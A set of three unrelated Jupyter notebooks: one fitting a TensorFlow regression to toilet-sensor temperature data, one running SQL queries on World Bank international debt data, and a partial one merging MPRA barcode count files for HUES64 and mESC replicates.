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" width="200"/>
</div>
**API Validation & Prediction** <br>
This document will be validate the gathered API Data and will is able to being used for predictions and analyses
***Temperature Prediction*** <br>
To start off Machine Learning is being used to predict the temperature of the certain amount of days in the toilet. By using basic regression model (linear) its possible to predict the temperature based on the API data thats being generated by the device.
# Imports <br>
In the first stage of the notebook all imports should be made for running the code later on in the notebook
```
import urllib.request
import json
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from tensorflow.keras.datasets import fashion_mnist
import datetime
from sklearn.model_selection import train_test_split
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
print(tf.__version__)
# Disable copy warn
pd.options.mode.chained_assignment = None # default='warn'
```
# Fetching API <br>
First gather the API Data from the URL. After that print the first elements of the fetched data
```
with urllib.request.urlopen("https://us-central1-bava-solutions.cloudfunctions.net/GetLogsOfADevice/.F0:08:D1:D8:07:D4") as url:
data = json.loads(url.read().decode())
df = pd.DataFrame(data)
df.tail()
# df['timestamp'][0]
```
# Plotting the data
```
df.plot(x='timestamp', y='tvoc_co2')
# Reading TVOC
df = pd.DataFrame(data)
df.plot(x='timestamp', y='tvoc_ppm')
# Reading humidty
df.plot(x='timestamp', y='hum')
# Reading temperature
df.plot(x='timestamp', y='temp')
```
# The numbers mason <br>
The numbers mason what do they mean?
```
# Getting all triggers by occupation
triggerd_by_occupation = df[df['occupied']==1]
triggerd_by_occupation.count()['occupied']
# Getting all triggers by timer
triggerd_by_timer = df[df['occupied']==0]
triggerd_by_timer.count()['occupied']
```
# Predictions <br>
**Predictions based on Machine learning data**<br>
First prediction is determining what the temperature might be in a few days.
```
# Tensorflow
np.set_printoptions(precision=3, suppress=True)
```
#Clean the data. Drop any columns with missing values or null values.
dropping timestamp and mac because they are categorical and irrelevant.
dropping BatteryLevel and LiquidLevel because they all have same data.
```
dataset = df.copy()
dataset.isna().sum()
dataset.dropna()
cleaned_dataset = dataset.drop(['mac', 'batteryLevel', 'liquidLevel', 'occupied'], axis=1)
temp = cleaned_dataset
for i in range(len(cleaned_dataset['timestamp'])):
cleaned_dataset['timestamp'][i] = datetime.datetime.utcfromtimestamp((cleaned_dataset['timestamp'][i]['_seconds']) ).strftime('%Y-%m-%d')
cleaned_dataset.index = pd.to_datetime(cleaned_dataset['timestamp'])
cleaned_dataset = cleaned_dataset[cleaned_dataset['tvoc_ppm'] != 0]
cleaned_dataset = cleaned_dataset.drop(['timestamp'], axis=1)
cleaned_dataset
```
#Splitting for regression using Tensorflow
```
train_data = cleaned_dataset.sample(frac=0.5, random_state=0)
test_data = cleaned_dataset.sample(frac=0.2, random_state=0)
# test_data
# cleaned_dataset = cleaned_dataset.drop(['timestamp'], axis=1)
# train_data, test_data = np.split(cleaned_dataset, [int(.3 *len(data))])
train_data
print(len(test_data), len(train_data), len(cleaned_dataset))
# Y = cleaned_dataset['temp']
# x = cleaned_dataset.loc[:, cleaned_dataset.columns != 'temp']
```
#Split attributes and labels apart
```
train_features = cleaned_dataset.copy()
test_features = cleaned_dataset.copy()
train_labels = train_features.pop('temp')
test_labels = test_features.pop('temp')
train_labels
train_data = train_data.drop(['temp'], axis=1)
test_data = test_data.drop(['temp'], axis=1)
print(test_data)
# train_dataset_timeseries = keras.preprocessing.timeseries_dataset_from_array(train_data, train_labels, sequence_length=len(train_data))
# TimeSeries
train_stat = train_data.describe().transpose()[['mean', 'std']]
train_stat
```
#Normalization
***Normalizing is helpful to bound data between the range from 0 to 1***
```
def normalize(row):
# t = row['timestamp']
answer = (row - train_stat['mean']) / train_stat['std']
print(row, answer)
# answer['timestamp'] = t
return answer
normed_train = normalize(train_data)
normed_test = normalize(test_data)
print(normed_test)
normed_train = np.asarray(normed_train).astype(np.float32)
normed_test = np.asarray(normed_test).astype(np.float32)
# normed_train
# normed_test
train_labels
```
#Building the model using Tensorflow Keras
```
# For building the model using function for in the future its better to create multiple models
def create_model():
model = keras.Sequential([
layers.Dense(64, activation=tf.nn.relu, input_shape=[len(train_data.keys())]),
layers.Dense(1)
])
optimiser = tf.keras.optimizers.RMSprop(0.001)
model.compile(loss='mse', optimizer=optimiser, metrics=['mae', 'mse'])
return model
model = create_model()
```
#Insights of the model
```
model.summary() # Overview of the created model
early_block = keras.callbacks.EarlyStopping(monitor='val_loss', patience=100) # Add auto stop incase the loss is less enough.
# Training model
full_model = model.fit(normed_train, train_labels, epochs=10000, validation_split=0.2, verbose=0, callbacks=[early_block]) # Actual model training
```
# Model training validation
How well did the model trained? How is the loss?
```
losses = pd.DataFrame(model.history.history)
losses.plot() # Plot the loss
```
## Model Testing
```
# Tesing the Model based on values from training X = Time , Y = Predicted temperature
testmodel = pd.DataFrame(model.predict(normed_test))
testmodel.plot()
# Predict what the temperature will be after x amount of days
howmany = 90 # 10 days
answer = model.predict([normed_test[0:(howmany % len(normed_test))]])
print(f"The temperature would be {answer.mean()} degrees after {howmany}")
```
|
github_jupyter
|
## 1. The World Bank's international debt data
<p>It's not that we humans only take debts to manage our necessities. A country may also take debt to manage its economy. For example, infrastructure spending is one costly ingredient required for a country's citizens to lead comfortable lives. <a href="https://www.worldbank.org">The World Bank</a> is the organization that provides debt to countries.</p>
<p>In this notebook, we are going to analyze international debt data collected by The World Bank. The dataset contains information about the amount of debt (in USD) owed by developing countries across several categories. We are going to find the answers to questions like: </p>
<ul>
<li>What is the total amount of debt that is owed by the countries listed in the dataset?</li>
<li>Which country owns the maximum amount of debt and what does that amount look like?</li>
<li>What is the average amount of debt owed by countries across different debt indicators?</li>
</ul>
<p><img src="https://assets.datacamp.com/production/project_754/img/image.jpg" alt=""></p>
<p>The first line of code connects us to the <code>international_debt</code> database where the table <code>international_debt</code> is residing. Let's first <code>SELECT</code> <em>all</em> of the columns from the <code>international_debt</code> table. Also, we'll limit the output to the first ten rows to keep the output clean.</p>
```
%%sql
postgresql:///international_debt
```
## 2. Finding the number of distinct countries
<p>From the first ten rows, we can see the amount of debt owed by <em>Afghanistan</em> in the different debt indicators. But we do not know the number of different countries we have on the table. There are repetitions in the country names because a country is most likely to have debt in more than one debt indicator. </p>
<p>Without a count of unique countries, we will not be able to perform our statistical analyses holistically. In this section, we are going to extract the number of unique countries present in the table. </p>
```
%%sql
SELECT COUNT(DISTINCT country_name) AS total_distinct_countries
FROM international_debt;
```
## 3. Finding out the distinct debt indicators
<p>We can see there are a total of 124 countries present on the table. As we saw in the first section, there is a column called <code>indicator_name</code> that briefly specifies the purpose of taking the debt. Just beside that column, there is another column called <code>indicator_code</code> which symbolizes the category of these debts. Knowing about these various debt indicators will help us to understand the areas in which a country can possibly be indebted to. </p>
```
%%sql
SELECT DISTINCT indicator_code AS distinct_debt_indicators FROM international_debt ORDER BY distinct_debt_indicators;
```
## 4. Totaling the amount of debt owed by the countries
<p>As mentioned earlier, the financial debt of a particular country represents its economic state. But if we were to project this on an overall global scale, how will we approach it?</p>
<p>Let's switch gears from the debt indicators now and find out the total amount of debt (in USD) that is owed by the different countries. This will give us a sense of how the overall economy of the entire world is holding up.</p>
```
%%sql
SELECT ROUND(SUM(debt)/1000000, 2) AS total_debt
FROM international_debt;
```
## 5. Country with the highest debt
<p>"Human beings cannot comprehend very large or very small numbers. It would be useful for us to acknowledge that fact." - <a href="https://en.wikipedia.org/wiki/Daniel_Kahneman">Daniel Kahneman</a>. That is more than <em>3 million <strong>million</strong></em> USD, an amount which is really hard for us to fathom. </p>
<p>Now that we have the exact total of the amounts of debt owed by several countries, let's now find out the country that owns the highest amount of debt along with the amount. <strong>Note</strong> that this debt is the sum of different debts owed by a country across several categories. This will help to understand more about the country in terms of its socio-economic scenarios. We can also find out the category in which the country owns its highest debt. But we will leave that for now. </p>
```
%%sql
SELECT
country_name,
ROUND(SUM(debt),2) AS total_debt
FROM international_debt
GROUP BY country_name
ORDER BY total_debt DESC
LIMIT 1;
```
## 6. Average amount of debt across indicators
<p>So, it was <em>China</em>. A more in-depth breakdown of China's debts can be found <a href="https://datatopics.worldbank.org/debt/ids/country/CHN">here</a>. </p>
<p>We now have a brief overview of the dataset and a few of its summary statistics. We already have an idea of the different debt indicators in which the countries owe their debts. We can dig even further to find out on an average how much debt a country owes? This will give us a better sense of the distribution of the amount of debt across different indicators.</p>
```
%%sql
SELECT
indicator_code AS debt_indicator,
indicator_name,
ROUND(AVG(debt),2) AS average_debt
FROM international_debt
GROUP BY debt_indicator, indicator_name
ORDER BY average_debt DESC
LIMIT 10;
```
## 7. The highest amount of principal repayments
<p>We can see that the indicator <code>DT.AMT.DLXF.CD</code> tops the chart of average debt. This category includes repayment of long term debts. Countries take on long-term debt to acquire immediate capital. More information about this category can be found <a href="https://datacatalog.worldbank.org/principal-repayments-external-debt-long-term-amt-current-us-0">here</a>. </p>
<p>An interesting observation in the above finding is that there is a huge difference in the amounts of the indicators after the second one. This indicates that the first two indicators might be the most severe categories in which the countries owe their debts.</p>
<p>We can investigate this a bit more so as to find out which country owes the highest amount of debt in the category of long term debts (<code>DT.AMT.DLXF.CD</code>). Since not all the countries suffer from the same kind of economic disturbances, this finding will allow us to understand that particular country's economic condition a bit more specifically. </p>
```
%%sql
SELECT
country_name,
indicator_name,
ROUND(debt, 2)
FROM international_debt
WHERE debt = (SELECT
MAX(debt)
FROM international_debt
WHERE indicator_code = 'DT.AMT.DLXF.CD' );
```
## 8. The most common debt indicator
<p>China has the highest amount of debt in the long-term debt (<code>DT.AMT.DLXF.CD</code>) category. This is verified by <a href="https://data.worldbank.org/indicator/DT.AMT.DLXF.CD?end=2018&most_recent_value_desc=true">The World Bank</a>. It is often a good idea to verify our analyses like this since it validates that our investigations are correct. </p>
<p>We saw that long-term debt is the topmost category when it comes to the average amount of debt. But is it the most common indicator in which the countries owe their debt? Let's find that out. </p>
```
%%sql
SELECT
indicator_name,
COUNT(indicator_code) as indicator_count
FROM international_debt
GROUP BY indicator_code, indicator_name
ORDER BY indicator_count DESC
LIMIT 20;
```
## 9. Other viable debt issues and conclusion
<p>There are a total of six debt indicators in which all the countries listed in our dataset have taken debt. The indicator <code>DT.AMT.DLXF.CD</code> is also there in the list. So, this gives us a clue that all these countries are suffering from a common economic issue. But that is not the end of the story, a part of the story rather. </p>
<p>Let's change tracks from <code>debt_indicator</code>s now and focus on the amount of debt again. Let's find out the maximum amount of debt across the indicators along with the respective country names. With this, we will be in a position to identify the other plausible economic issues a country might be going through. By the end of this section, we will have found out the debt indicators in which a country owes its highest debt. </p>
<p>In this notebook, we took a look at debt owed by countries across the globe. We extracted a few summary statistics from the data and unraveled some interesting facts and figures. We also validated our findings to make sure the investigations are correct.</p>
```
%%sql
SELECT
country_name,
indicator_code,
round(MAX(debt),2) as maximum_debt
FROM international_debt
GROUP BY country_name, indicator_code
ORDER BY maximum_debt DESC
LIMIT 10;
```
|
github_jupyter
|
```
import pandas as pd
import numpy as np
HUES64_rep1_tfxn1_fs = ["../../../data/02__mpra/01__counts/07__HUES64_rep6_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/07__HUES64_rep6_lib2_BARCODES.txt"]
HUES64_rep1_tfxn2_fs = ["../../../data/02__mpra/01__counts/08__HUES64_rep7_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/08__HUES64_rep7_lib2_BARCODES.txt"]
HUES64_rep1_tfxn3_fs = ["../../../data/02__mpra/01__counts/09__HUES64_rep8_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/09__HUES64_rep8_lib2_BARCODES.txt"]
HUES64_rep2_tfxn1_fs = ["../../../data/02__mpra/01__counts/10__HUES64_rep9_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/10__HUES64_rep9_lib2_BARCODES.txt"]
HUES64_rep2_tfxn2_fs = ["../../../data/02__mpra/01__counts/11__HUES64_rep10_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/11__HUES64_rep10_lib2_BARCODES.txt"]
HUES64_rep2_tfxn3_fs = ["../../../data/02__mpra/01__counts/12__HUES64_rep11_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/12__HUES64_rep11_lib2_BARCODES.txt"]
HUES64_rep3_tfxn1_fs = ["../../../data/02__mpra/01__counts/16__HUES64_rep12_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/16__HUES64_rep12_lib2_BARCODES.txt"]
HUES64_rep3_tfxn2_fs = ["../../../data/02__mpra/01__counts/17__HUES64_rep13_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/17__HUES64_rep13_lib2_BARCODES.txt"]
HUES64_rep3_tfxn3_fs = ["../../../data/02__mpra/01__counts/18__HUES64_rep14_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/18__HUES64_rep14_lib2_BARCODES.txt"]
mESC_rep1_tfxn1_fs = ["../../../data/02__mpra/01__counts/15__mESC_rep3_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/15__mESC_rep3_lib2_BARCODES.txt"]
mESC_rep2_tfxn1_fs = ["../../../data/02__mpra/01__counts/19__mESC_rep4_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/19__mESC_rep4_lib2_BARCODES.txt",
"../../../data/02__mpra/01__counts/19__mESC_rep4_lib3_BARCODES.txt"]
mESC_rep3_tfxn1_fs = ["../../../data/02__mpra/01__counts/20__mESC_rep5_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/20__mESC_rep5_lib2_BARCODES.txt",
"../../../data/02__mpra/01__counts/20__mESC_rep5_lib3_BARCODES.txt"]
```
## 1. import, merge, sum
### HUES64 rep 1
```
for i, f in enumerate(HUES64_rep1_tfxn1_fs):
if i == 0:
HUES64_rep1_tfxn1 = pd.read_table(f, sep="\t")
print(len(HUES64_rep1_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep1_tfxn1 = HUES64_rep1_tfxn1.merge(tmp, on="barcode")
HUES64_rep1_tfxn1["count"] = HUES64_rep1_tfxn1[["count_x", "count_y"]].sum(axis=1)
HUES64_rep1_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep1_tfxn1.head()
for i, f in enumerate(HUES64_rep1_tfxn2_fs):
if i == 0:
HUES64_rep1_tfxn2 = pd.read_table(f, sep="\t")
print(len(HUES64_rep1_tfxn2))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep1_tfxn2 = HUES64_rep1_tfxn2.merge(tmp, on="barcode")
HUES64_rep1_tfxn2["count"] = HUES64_rep1_tfxn2[["count_x", "count_y"]].sum(axis=1)
HUES64_rep1_tfxn2.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep1_tfxn2.head()
for i, f in enumerate(HUES64_rep1_tfxn3_fs):
if i == 0:
HUES64_rep1_tfxn3 = pd.read_table(f, sep="\t")
print(len(HUES64_rep1_tfxn3))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep1_tfxn3 = HUES64_rep1_tfxn3.merge(tmp, on="barcode")
HUES64_rep1_tfxn3["count"] = HUES64_rep1_tfxn3[["count_x", "count_y"]].sum(axis=1)
HUES64_rep1_tfxn3.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep1_tfxn3.head()
```
### HUES64 rep 2
```
for i, f in enumerate(HUES64_rep2_tfxn1_fs):
if i == 0:
HUES64_rep2_tfxn1 = pd.read_table(f, sep="\t")
print(len(HUES64_rep2_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep2_tfxn1 = HUES64_rep2_tfxn1.merge(tmp, on="barcode")
HUES64_rep2_tfxn1["count"] = HUES64_rep2_tfxn1[["count_x", "count_y"]].sum(axis=1)
HUES64_rep2_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep2_tfxn1.head()
for i, f in enumerate(HUES64_rep2_tfxn2_fs):
if i == 0:
HUES64_rep2_tfxn2 = pd.read_table(f, sep="\t")
print(len(HUES64_rep2_tfxn2))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep2_tfxn2 = HUES64_rep2_tfxn2.merge(tmp, on="barcode")
HUES64_rep2_tfxn2["count"] = HUES64_rep2_tfxn2[["count_x", "count_y"]].sum(axis=1)
HUES64_rep2_tfxn2.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep2_tfxn2.head()
for i, f in enumerate(HUES64_rep2_tfxn3_fs):
if i == 0:
HUES64_rep2_tfxn3 = pd.read_table(f, sep="\t")
print(len(HUES64_rep2_tfxn3))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep2_tfxn3 = HUES64_rep2_tfxn3.merge(tmp, on="barcode")
